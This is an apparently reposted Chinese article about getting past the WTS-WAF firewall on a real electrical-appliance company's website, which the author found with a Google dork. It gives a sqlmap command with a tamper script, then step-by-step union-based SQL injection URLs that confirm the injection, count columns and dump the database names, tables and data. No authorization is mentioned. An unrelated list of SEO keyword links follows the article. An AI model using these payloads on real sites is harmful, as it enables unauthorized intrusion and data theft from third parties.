如何进行绕过WTS-WAF的分析
发表于:2025-02-23 作者:千家信息网编辑
千家信息网最后更新 2025年02月23日,本篇文章为大家展示了如何进行绕过WTS-WAF的分析,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。0x01.寻找目标inurl:.php?id= intext
千家信息网最后更新 2025年02月23日如何进行绕过WTS-WAF的分析
本篇文章为大家展示了如何进行绕过WTS-WAF的分析,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。
0x01.寻找目标
inurl:.php?id= intext:电器
找到了一个电器公司的网站,随便测了测,发现有waf
这还不安排(找了点资料,貌似直接加号代替空格就可以,直接尝试)
0x02.操作
发现没有waf拦截了
资料还说了
sqlmap.py -u http://*/*.php?id=29 --tables --tamper space2plus.py
工具我尝试了发现无法开始
就这样子......
0x03.手注
http://*/*.php?id=1+and+1=1 #回显正常http://*/*.php?id=1+and+1=2 #回显错误说明存在注入http://*/*.php?id=1+order+by+15 #15回显错误http://*/*.php?id=1+order+by+14 #14回显正常说明有14个字段http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 #-1让它错误然后执行后面
它回显了第2和第8
http://*/*.php?id=-1+union+select+1,database(),3,4,5,6,7,user(),9,10,11,12,13,14 #查询当前数据库信息和当前用户一些常见的函数version() #显示数据库当前版本database() / schema() #显示当前数据库名user() / system_user() / session_user() / current_user() / current_user() #显示当前用户名称charset(str) #返回字符串str的字符集collation(str) #返回字符串str的字符排列方式
0x04.查数据
爆数据库
http://*/*.php?id=-1+union+select+1,group_concat(schema_name),3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1
它不能group_concat,那我就一个一个查了!http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1 #从1开始取一个http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+1,1 #从2开始取一个
爆数据表
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1
爆数据
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,字段名,9,10,11,12,13,14+表名+limit+0,1
总结:
1.工具跑不起就只能手注了
2.实践了下mysql的手注
上述内容就是如何进行绕过WTS-WAF的分析,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注行业资讯频道。
数据
字符
数据库
错误
分析
内容
字段
字符串
工具
技能
用户
电器
知识
资料
尝试
简明
简明扼要
信息
公司
函数
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
德阳软件开发大概费用
服务器如何查询出错报告
做比特币软件开发
河南服务器电源销售价格
甘肃中小学生网络安全
夺宝系统软件开发费用
图书馆数据库概念设计er
笔记本电脑提示网络安全密
一带一路数据库 费用
qq服务器连接产品
网络安全故事500字
云服务器如何备份
中国互联网高科技股
阿里投资的服务器叫什么
网络安全是意思
腾讯和阿里怎么给服务器打补丁
路由器vpn服务器
计算机软件开发与应用专业考研
计算机网络安全试卷及答案1
最近比较大的网络安全事件
电信安全网络安全信息安全
守护网络安全共筑平安校园
数据库如何给root授权
河南驰海网络技术有限公司
网络安全中的十大漏洞
科技的最高境界就是互联网吗
郑州智游网络技术有限公司
opc服务器设置
数据库查找成绩低于60的人数
浪潮服务器安全模式怎么进